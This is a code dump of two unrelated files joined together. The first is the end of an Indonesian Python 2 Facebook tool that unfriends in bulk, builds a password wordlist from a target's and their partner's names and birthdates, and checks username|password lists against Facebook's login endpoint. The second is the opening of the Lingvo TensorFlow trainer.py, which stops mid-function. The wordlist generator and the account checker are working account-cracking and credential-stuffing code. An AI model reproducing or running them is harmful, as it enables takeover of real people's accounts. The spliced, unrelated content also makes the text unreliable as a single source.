requests.delete('https://graph.facebook.com/me/friends?uid=' + id + '&access_token=' + toket) print '\x1b[1;97m[\x1b[1;92mRemove\x1b[1;97m] ' + nama + ' => ' + id except IndexError: pass except KeyboardInterrupt: print '\x1b[1;91m[!] 
Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() print '\n\x1b[1;91m[+] \x1b[1;97mFinish' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_bot() def lain(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Write Status' print '║-> \x1b[1;37;40m2. Make Wordlist' print '║-> \x1b[1;37;40m3. Account Checker' print '║-> \x1b[1;37;40m4. List Group' print '║-> \x1b[1;37;40m5. Profile Guard' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' pilih_lain() def pilih_lain(): other = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if other == '': print '\x1b[1;91m[!] Can\'t empty' pilih_lain() else: if other == '1': status() else: if other == '2': wordlist() else: if other == '3': check_akun() else: if other == '4': grupsaya() else: if other == '5': guard() else: if other == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + other + ' \x1b[1;91mnot found' pilih_lain() def status(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' msg = raw_input('\x1b[1;91m[+] \x1b[1;92mWrite status \x1b[1;91m:\x1b[1;97m ') if msg == '': print '\x1b[1;91m[!] 
Can\'t empty' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: res = requests.get('https://graph.facebook.com/me/feed?method=POST&message=' + msg + '&access_token=' + toket) op = json.loads(res.text) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[+] \x1b[1;92mStatus ID\x1b[1;91m : \x1b[1;97m' + op['id'] raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def wordlist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi data lengkap target dibawah' print 52 * '\x1b[1;97m\xe2\x95\x90' a = raw_input('\x1b[1;91m[+] \x1b[1;92mName Depan \x1b[1;97m: ') file = open(a + '.txt', 'w') b = raw_input('\x1b[1;91m[+] \x1b[1;92mName Tengah \x1b[1;97m: ') c = raw_input('\x1b[1;91m[+] \x1b[1;92mName Belakang \x1b[1;97m: ') d = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan \x1b[1;97m: ') e = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') f = e[0:2] g = e[2:4] h = e[4:] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] 
\x1b[1;93mKalo Jomblo SKIP aja :v' i = raw_input('\x1b[1;91m[+] \x1b[1;92mName Pacar \x1b[1;97m: ') j = raw_input('\x1b[1;91m[+] \x1b[1;92mName Panggilan Pacar \x1b[1;97m: ') k = raw_input('\x1b[1;91m[+] \x1b[1;92mTanggal Lahir Pacar >\x1b[1;96mex: |DDMMYY| \x1b[1;97m: ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') l = k[0:2] m = k[2:4] n = k[4:] file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k)) wg = 0 while wg < 100: wg = wg + 1 file.write(a + str(wg) + '\n') en = 0 while en < 100: en = en + 1 file.write(i + str(en) + '\n') word = 0 while word < 100: word = word + 1 file.write(d + str(word) + '\n') gen = 0 while gen < 100: gen = gen + 1 file.write(j + str(gen) + '\n') file.close() time.sleep(1.5) print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a 
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except IOError as e: print '\x1b[1;91m[!] Make file failed' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def check_akun(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password' print 52 * '\x1b[1;97m\xe2\x95\x90' live = [] cek = [] die = [] try: file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ') list = open(file, 'r').readlines() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for meki in list: username, password = meki.strip().split(str(pemisah)) url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = requests.get(url) mpsh = json.loads(data.text) if 'access_token' in mpsh: live.append(password) print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password elif 'www.facebook.com' in mpsh['error_msg']: cek.append(password) print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password else: die.append(password) print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die)) 
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def grupsaya(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' try: uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket) gud = json.loads(uh.text) for p in gud['data']: nama = p['name'] id = p['id'] f = open('grupid.txt', 'w') listgrup.append(id) f.write(id + '\n') print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama) print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id) print 52 * '\x1b[1;97m=' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup) print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt' f.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except KeyError: os.remove('grupid.txt') print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() def guard(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Enable' print '║-> \x1b[1;37;40m2. Disable' print '║-> \x1b[1;31;40m0. 
Back' print '\x1b[1;37;40m║' g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if g == '1': aktif = 'true' gaz(toket, aktif) else: if g == '2': non = 'false' gaz(toket, non) else: if g == '0': lain() else: if g == '': keluar() else: keluar() def get_userid(toket): url = 'https://graph.facebook.com/me?access_token=%s' % toket res = requests.get(url) uid = json.loads(res.text) return uid['id'] def gaz(toket, enable=True): id = get_userid(toket) data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id)) headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket} url = 'https://graph.facebook.com/graphql' res = requests.post(url, data=data, headers=headers) print res.text if '"is_shielded":true' in res.text: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: if '"is_shielded":false' in res.text: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') lain() else: print '\x1b[1;91m[!] Error' keluar() if __name__ == '__main__': login()
trainer.py
# Lint as: python2, python3 # Copyright 2018 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== # pylint: disable=line-too-long """Trainer. To run locally: .. code-block:: bash $ bazel build -c opt //lingvo:trainer $ bazel-bin/lingvo/trainer --logtostderr \ --model=image.mnist.LeNet5 --mode=sync --logdir=/tmp/lenet5 \ --run_locally=cpu To use GPU, add `--config=cuda` to build command and set `--run_locally=gpu`. 
""" # pylint: enable=line-too-long from __future__ import absolute_import from __future__ import division from __future__ import print_function import inspect import os import re import threading import time from lingvo import base_trial from lingvo import model_registry import lingvo.compat as tf from lingvo.core import base_model from lingvo.core import base_model_params from lingvo.core import cluster_factory from lingvo.core import inference_graph_exporter from lingvo.core import metrics from lingvo.core import py_utils import numpy as np import six from six.moves import range from six.moves import zip from lingvo import base_runner from tensorflow.contrib.tpu.python.tpu import device_assignment as device_assignment_lib from tensorflow.contrib.tpu.python.tpu import tpu_function from tensorflow.core.protobuf import config_pb2 from tensorflow.python.tpu import training_loop as tpu_training_loop # pylint:disable=g-direct-tensorflow-import from tensorflow.python.tpu.ops import tpu_ops # pylint:disable=g-direct-tensorflow-import tf.flags.DEFINE_string( 'model', '', 'Name of the model class to train.' 'Must be a model defined in the model_registry.') tf.flags.DEFINE_string( 'model_task_name', '', 'For multitask models: ' 'select task to train/evaluate/decode. ' 'Empty means to sample a task (training only).') tf.flags.DEFINE_string('logdir', '', 'Log directory.') tf.flags.DEFINE_bool( 'interactive', False, 'If True, enter interactive IPython for the controller job.') tf.flags.DEFINE_string( 'run_locally', '', 'Can be empty, cpu, or gpu. If not empty, ignores cluster configuration ' 'flags and runs controller and trainer in a single local process.') tf.flags.DEFINE_string('tf_master', '', 'TF runtime.') tf.flags.DEFINE_string( 'cluster_spec', '', 'A tf.train.ClusterSpec to override the master. ' 'The dict is specified as: job=host1:port1,host2:port2,' 'host3:port3@job2=host3:port4,...') tf.flags.DEFINE_string( 'mode', 'async', 'How this trainer binary is used. 
' 'async: used in an async training setup; ' 'sync: used in a sync training setup; ' 'shell: an interactive shell for development; ' 'inspect_evaler: print evaler dataset names; ' 'inspect_decoder: print decoder dataset names; ' 'write_inference_graph: write inference graphs to logdir.') tf.flags.DEFINE_string('job', '', 'trainer/controller/eval, etc.') tf.flags.DEFINE_integer('task', 0, 'Task id within the job.') tf.flags.DEFINE_string('controller_job', '/job:controller', 'Job name.') tf.flags.DEFINE_integer('controller_gpus', 0, 'Number of controller GPUs.') tf.flags.DEFINE_string('worker_job', '/job:trainer', 'Job name.') tf.flags.DEFINE_integer('worker_replicas', 1, 'Number of replicas.') tf.flags.DEFINE_integer('worker_gpus', 0, 'Number of gpus to use per replica.') tf.flags.DEFINE_integer('worker_tpus', 0, 'Number of tpus to use per replica.') tf.flags.DEFINE_integer('worker_num_tpu_hosts', 0, 'Number of tpu hosts.') tf.flags.DEFINE_integer('worker_split_size', 1, 'Number of devices for one split.') tf.flags.DEFINE_string('ps_job', '/job:ps', 'Job name') tf.flags.DEFINE_integer('ps_replicas', 1, 'Number of replicas.') tf.flags.DEFINE_integer('ps_gpus', 0, 'Number of gpus to use per replica.') tf.flags.DEFINE_string('input_job', '/job:input', 'Job name') tf.flags.DEFINE_integer('input_replicas', 0, 'Number of replicas.') tf.flags.DEFINE_string( 'input_targets', '', 'Target network addresses for the ' 'input job. 
E.g., a single ip:port, or a list of ' 'comma-separated grpc://ip:port, etc.') tf.flags.DEFINE_string('evaler_job', '/job:evaler', 'Job name') tf.flags.DEFINE_integer('evaler_replicas', 0, 'Number of replicas.') tf.flags.DEFINE_integer('evaler_gpus', 0, 'Number of gpus to use per replica.') tf.flags.DEFINE_string('decoder_job', '/job:decoder', 'Job name') tf.flags.DEFINE_integer('decoder_replicas', 0, 'Number of replicas.') tf.flags.DEFINE_integer('decoder_gpus', 0, 'Number of gpus to use per replica.') tf.flags.DEFINE_bool( 'evaler_in_same_address_as_controller', False, 'Whether or not evaler is in the same address space as ' ' controller. This flag is meant for unittest only.') tf.flags.DEFINE_string( 'vizier_reporting_job', 'evaler', 'Job reponsible for reporting metrics. This specifies a ' 'job prefix, evaler will match all evaler jobs, while ' 'evaler_dev and decoder_dev will only match the corresponding ' 'jobs that are on the dev set.') tf.flags.DEFINE_integer( 'enqueue_max_steps', None, 'Max enqueue steps. -1 meaning no limit.' ' This flag should be set for unit-test only.') tf.flags.DEFINE_integer('saver_max_to_keep', None, 'Maximum number of recent checkpoints to keep.') tf.flags.DEFINE_float('saver_keep_checkpoint_every_n_hours', None, 'How often to keep a checkpoint.') # Please consider adding model params instead of adding flags. FLAGS = tf.flags.FLAGS # Map from split size to computation_shape for TPU model parallelism. SUPPORTED_SPLIT_SIZE = { 1: [1, 1, 1], 2: [1, 1, 2], 4: [1, 2, 2], 8: [2, 2, 2], 16: [4, 2, 2], 32: [4, 4, 2], 64: [4, 8, 2], 128: [8, 8, 2] } def ComputationShape(split_size): """Decides the computation shape based on the split_size.""" assert (split_size in SUPPORTED_SPLIT_SIZE), ('Model parallelism with %d', 'devices is currently not' ' supported.' % split_size) return SUPPORTED_SPLIT_SIZE[split_size] # useful for debugging. def _StartShell(local_ns=None): # An interactive shell is useful for debugging/development. 
import IPython # pylint: disable=g-import-not-at-top user_ns = {} if local_ns: user_ns.update(local_ns) user_ns.update(globals()) IPython.start_ipython(argv=[], user_ns=user_ns) def _ModelAnalysis(model): """Returns a text showing variable sizes and their total size.""" class Analyzer(object): def __init__(self): self._seen_var = {} self.total = 0 def __call__(self, v): assert isinstance(v, tf.Variable) # pylint: disable=protected-access if not v.shape.is_fully_defined(): # Only Cudnn RNN params lack static shapes. if hasattr(v, 'approx_size'): size = v.approx_size else: return '%-20s %10s %s' % (v.shape, 'n/a', v._shared_name) else: size = v.shape.num_elements() if v._shared_name not in self._seen_var: self._seen_var[v._shared_name] = size self.total += size return '%-20s %10d %s' % (v.shape, size, v._shared_name) analyzer = Analyzer() output = '\n' output += model.vars.Transform(analyzer).DebugString() output += '\n' output += '=' * 100 output += '\ntotal #params: %10d\n' % (analyzer.total) return output, analyzer.total class Controller(base_runner.BaseRunner): """Controller for a training cluster.""" def __init__(self, *args, **kwargs): super(Controller, self).__init__(*args, **kwargs) assert not self._model_task_name, 'Controller needs all tasks!' 
    self._save_path = os.path.join(self._train_dir, 'ckpt')
    tf.gfile.MakeDirs(self._train_dir)
    self._control_dir = os.path.join(self._logdir, 'control')
    tf.gfile.MakeDirs(self._control_dir)
    self._summary_writer = self._CreateSummaryWriter(self._control_dir)
    self._time_steps = []  # A short history of (timestamp, global_step)

    # Build the full FProp/BProp graph plus saver/initializer ops under the
    # cluster's device placement.
    with self._graph.as_default(), tf.container(self._container_id):
      with self._cluster, tf.device(self._cluster.GetPlacer()):
        self._model = self.params.Instantiate()
        self._params = self._model.params
        self._model.ConstructFPropBPropGraph()
        self._saver = self._GetSaver()
        self._summary_op = tf.summary.merge_all()
        self._vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
        self._uninitialized = tf.report_uninitialized_variables(self._vars)
        self._initialize_all = tf.global_variables_initializer()
        self.initialize_tables = tf.tables_initializer()
        self._initialize_local_vars = tf.local_variables_initializer()
        self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
        self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)

    self._ExportMetrics(params=self.params)
    # Log a per-variable size breakdown and persist params/graph for
    # debugging and reproducibility.
    self._model_analysis, self._total_num_params = _ModelAnalysis(self._model)
    py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
    self._WriteToLog(self._model_analysis, self._control_dir,
                     'model_analysis.txt')
    self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
    tf.train.write_graph(self._graph.as_graph_def(), self._control_dir,
                         'train.pbtxt')

  def Start(self):
    """Runs the controller loop on a background runner thread."""
    self._RunLoop('controller', self._Loop)

  def StartEnqueueOp(self, op):
    """Runs one enqueue op in its own loop thread."""
    self._RunLoop(
        'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])

  def _Loop(self):
    self._summary_writer.add_graph(self._graph)
    with tf.container(self._container_id), self._GetSession() as sess:
      gsteps = py_utils.GetGlobalStep()
      examples = self._model.total_examples

      if FLAGS.interactive:
        # Into interactive debugging mode.
        _StartShell(locals())
        return

      # This initializes local tables
      sess.run(self.initialize_tables)
      # This initializes local variables.
      sess.run(self._initialize_local_vars)

      # TODO(zhifengc): Moves these options into params.
      tp = self.params.train
      save_interval_seconds = tp.save_interval_seconds
      summary_interval_steps = tp.summary_interval_steps

      next_checkpoint_seconds = 0
      next_summary_step = 1

      while True:
        now = time.time()
        next_iteration_seconds = now + min(
            10, save_interval_seconds)  # 10 seconds or less

        # Init/restore variable if needed.
        self._RestoreIfNeeded(sess)

        global_step, total_examples = sess.run([gsteps, examples])
        step_rate, example_rate = self._RecordStepRate(global_step,
                                                       total_examples)
        if self._trial.ShouldStop() or self._ShouldStop(sess, global_step):
          tf.logging.info('Training finished.')
          # Final checkpoint before shutting down.
          self._Save(sess, global_step)
          # Close all the queues so the enqueue threads can also finish.
          for close_op in self.close_queue_ops:
            sess.run(close_op)
          sess.close()
          return

        # Checkpoint.
        if now >= next_checkpoint_seconds:
          self._Save(sess, gsteps)
          next_checkpoint_seconds = now + save_interval_seconds

        # Summary.
        if self._summary_op is not None and global_step >= next_summary_step:
          tf.logging.info('Write summary @%s', global_step)
          summary_str = sess.run(self._summary_op)
          if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
            # An empty ndarray means no summaries were actually collected.
            tf.logging.info('Skipping summary: %s', summary_str)
          else:
            self._summary_writer.add_summary(summary_str, global_step)
          self._SummarizeValue(global_step, 'total_num_params',
                               self._total_num_params)
          next_summary_step = global_step + summary_interval_steps
          tf.logging.info('Write summary done: step %d', global_step)

        self._SetStatusMessage(
            'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' %
            (global_step, step_rate, example_rate))
        self._ExportMetrics(
            global_step=global_step,
            step_rate=step_rate,
            example_rate=example_rate)

        now = time.time()
        if now < next_iteration_seconds:
          time.sleep(next_iteration_seconds - now)

  def _Save(self, sess, gsteps):
    """Saves a checkpoint to self._save_path tagged with the global step."""
    tf.logging.info('Save checkpoint')
    path = self._saver.save(sess, self._save_path, gsteps)
    tf.logging.info('Save checkpoint done: %s', path)

  def _Restore(self, sess):
    """Restores from the latest checkpoint in train_dir, if any.

    Returns:
      The checkpoint path restored from, or None if no checkpoint exists.
    """
    path = tf.train.latest_checkpoint(self._train_dir)
    if path:
      tf.logging.info('Load from checkpoint %s.', path)
      self._saver.restore(sess, path)
      tf.logging.info('Load checkpoint done.')
    return path

  def _RestoreIfNeeded(self, sess):
    """Restores or initializes any variables that are still uninitialized."""
    uninitialized_var_names = list(sess.run(self._uninitialized))
    if not uninitialized_var_names:
      return
    tf.logging.info('Uninitialized var list: %s ', uninitialized_var_names)
    # Prefer restoring from an existing checkpoint over re-initializing.
    if self._Restore(sess):
      return
    if (not any(task.params.train.init_from_checkpoint_rules
                for task in self._model.tasks) and
        not self._params.train.init_from_checkpoint_rules):
      tf.logging.info('Initialize ALL variables: %s', uninitialized_var_names)
      sess.run([self._initialize_all])
      tf.logging.info('Initialize variables done.')
      return
    # There was a race in local run. Another thread will get unblocked once
    # _initialize_all is called. OverrideVarsFromCheckpoints
    # might not happen at the right time.
    for task in self._model.tasks:
      tp = task.params.train
      if tp.init_from_checkpoint_rules:
        tf.logging.info('OverrideVarsFromCheckpoints %s',
                        tp.init_from_checkpoint_rules)
        py_utils.OverrideVarsFromCheckpoints(sess, self._vars,
                                             tp.init_from_checkpoint_rules)

    if self._params.train.init_from_checkpoint_rules:
      tp = self._params.train
      tf.logging.info('OverrideVarsFromCheckpoints %s',
                      tp.init_from_checkpoint_rules)
      py_utils.OverrideVarsFromCheckpoints(sess, self._vars,
                                           tp.init_from_checkpoint_rules)

    uninitialized_var_names = list(sess.run(self._uninitialized))
    if not uninitialized_var_names:
      return

    # uninitialized_var_names is a list of strings without ":0" suffix.
    assert all(isinstance(s, str) for s in uninitialized_var_names)
    # Need to retrieve vars, removing ":0" suffix from names.
    uninitialized_vars = [
        v for v in self._vars if v.name[:-2] in uninitialized_var_names
    ]
    tf.logging.info('Initialize variables: %s',
                    [v.name for v in uninitialized_vars])
    sess.run(tf.variables_initializer(uninitialized_vars))

  def _SummarizeValue(self, steps, tag, value):
    """Writes a scalar summary `tag`=`value` at step `steps`."""
    self._summary_writer.add_summary(
        metrics.CreateScalarSummary(tag, value), steps)

  def _RecordStepRate(self, current_steps, total_examples):
    """Computes the overall step rate and adds a summary."""
    self._time_steps.append((time.time(), current_steps, total_examples))
    # Keeps a relative long history to compute a smooth steps/second.
    # Removes duplicate stats for step = 0 to get rid of the warm-up period.
while (self._time_steps[-1][1] - self._time_steps[0][1] > 10000 or (len(self._time_steps) > 1 and self._time_steps[0][1] == self._time_steps[1][1])): del self._time_steps[0] (t0, s0, e0), (t1, s1, e1) = self._time_steps[0], self._time_steps[-1] rate = 0.0 example_rate = 0.0 if t1 > t0 + 1: elapsed_secs = t1 - t0 rate = (s1 - s0) / elapsed_secs example_rate = (e1 - e0) / elapsed_secs tf.logging.info('Steps/second: %f, Examples/second: %f', rate, example_rate) self._SummarizeValue(current_steps, 'global_step/sec', rate) self._SummarizeValue(current_steps, 'examples/sec', example_rate) return rate, example_rate class Trainer(base_runner.BaseRunner): """Trainer on non-TPU.""" def __init__(self, *args, **kwargs): super(Trainer, self).__init__(*args, **kwargs) with self._graph.as_default(), tf.container(self._container_id): with self._cluster, tf.device(self._cluster.GetPlacer()): self._model = self.params.Instantiate() self._params = self._model.params self._model.ConstructFPropBPropGraph() self.initialize_tables = tf.tables_initializer() self._initialize_local_vars = tf.local_variables_initializer() self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS) self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS) tf.logging.info('Trainer number of enqueue ops: %d', len(self.enqueue_ops)) try: self._task_probs_summary_writers = [] for task in self._model.task_schedule.tasks: path = os.path.join(os.path.join(self._train_dir, task)) tf.gfile.MakeDirs(path) self._task_probs_summary_writers.append(self._CreateSummaryWriter(path)) except AttributeError: tf.logging.info('AttributeError. Expected for single task models.') self._task_probs_summary_writers = [] # Saves the graph def. 
if self.params.cluster.task > 0: self._summary_writer = None else: self._summary_writer = self._CreateSummaryWriter(self._train_dir) tf.train.write_graph(self._graph.as_graph_def(), self._train_dir, 'train.pbtxt') worker_id = self.params.cluster.task self._start_up_delay_steps = (((worker_id + 1) * worker_id / 2) * self.params.train.start_up_delay_steps) def _SummarizeValue(self, steps, tag, value, writer): if writer: writer.add_summary(metrics.CreateScalarSummary(tag, value), steps) def Start(self): self._RunLoop('trainer', self._Loop) def StartEnqueueOp(self, op): self._RunLoop( 'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op]) def _LoopEnqueue(self, op): # Evaler/Controller jobs may find that the trial is infeasible and report # done earlier. This is an important check since the trainer may retry # indefinitely without it. if self._trial.ShouldStop(): tf.logging.info('Training skipped (trial requested to stop).') return return super(Trainer, self)._LoopEnqueue(op) def _Loop(self): # Evaler/Controller jobs may find that the trial is infeasible and report # done earlier. This is an important check since the trainer may retry # indefinitely without it. if self._trial.ShouldStop(): tf.logging.info('Training skipped (trial requested to stop).') return with tf.container(self._container_id), self._GetSession() as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. 
sess.run(self._initialize_local_vars) global_step = None @py_utils.Retry(retry_value=(tf.errors.FailedPreconditionError,)) def _WaitTillInit(): """Wait until the model is ready.""" try: global_step = sess.run(py_utils.GetGlobalStep()) except tf.errors.FailedPreconditionError as e: tf.logging.info('Probably the expected race on global_step: %s', e) raise msg = 'step:%6d' % global_step self._SetStatusMessage(msg) if global_step < self._start_up_delay_steps: msg = 'global step (%d) has not reached start up delay steps (%d)' % ( global_step, self._start_up_delay_steps) tf.logging.info('%s', msg) raise tf.errors.FailedPreconditionError( node_def=None, op=None, message=msg) return global_step global_step = _WaitTillInit() status_interval_steps = 100 next_status_step = 1 eval_metrics = None while True: if (self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics) or self._ShouldStop(sess, global_step)): tf.logging.info('Training finished.') # Close all the queues so the enque threads can also finish. for close_op in self.close_queue_ops: sess.run(close_op) if self._early_stop: time.sleep(300) # controller hangs if it doesn't finish first return # If a task is explicitly specified, only train that task. if self._model_task_name: model_task = self._model.GetTask(self._model_task_name) else: # Note: This is a slightly stale global_step value from the previous # sess.run() call. # For multi-task models, `self._model.task_schedule.cur_probs` will # be updated. 
